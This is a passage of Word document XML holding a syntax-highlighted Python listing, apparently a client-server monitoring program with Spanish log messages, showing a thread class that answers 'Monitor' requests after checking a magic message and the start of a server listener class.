      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">152  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="l153"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">153  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Threading class to listen Monitor petitions and create client parameters for response and send data to monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="501" w:name="l154"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">154  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>Clien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02" w:name="l155"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">155  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>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03" w:name="l156"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">156  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>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504" w:name="l157"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">157  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="50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onn </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="505" w:name="l158"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">158  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="50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06" w:name="l159"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">159  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>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07" w:name="l160"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">160  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="50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response </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>b64encode</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>bytes</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08" w:name="l161"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">161  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="l162"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">162  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>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10" w:name="l163"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">163  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">global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p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="511" w:name="l164"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">164  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="512" w:name="l165"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">165  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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Recibida petición de Monitor desde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13" w:name="l166"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">166  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>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recv</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_BUFFER_SIZE</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r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>rstrip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">()     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Process data / message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="514" w:name="l167"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">167  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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 ha recibido: {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="515" w:name="l168"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">168  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="516" w:name="l169"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">169  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">data </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>MAGIC_MESSAGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="517" w:name="l170"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">170  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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Mensaje correcto. Conexion establecida. Respondiendo {} {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="518" w:name="l171"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">171  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>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19" w:name="l172"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">172  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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20" w:name="l173"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">173  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Voy a iniciar conexion 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21" w:name="l174"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">174  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_ip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01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Set data for reverse communication to the Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="l175"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">175  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_enable_send </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>= True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="l176"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">176  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="52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24" w:name="l177"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">177  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>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No tiene permiso.'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="525" w:name="l178"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">178  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_enable_send </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>= False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="526" w:name="l179"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">179  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="526"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">monitor_ip </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>= None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="527" w:name="l180"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">180  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="52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msg</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28" w:name="l181"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">181  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="52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spondiendo {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</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29" w:name="l182"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">182  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="530" w:name="l183"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">183  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="53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31" w:name="l184"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">184  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="532" w:name="l185"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">185  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="533" w:name="l186"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">186  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ServerListener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34" w:name="l187"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">187  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="534"/>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ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>buffer_size</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SERVER_BUFFER_SIZ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35" w:name="l188"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">188  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>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536" w:name="l189"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">189  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>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name </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>APPNAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="l190"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">190  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="53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38" w:name="l191"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">191  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="53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39" w:name="l192"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">192  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="53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buffer_size </w:t>
      </w:r>
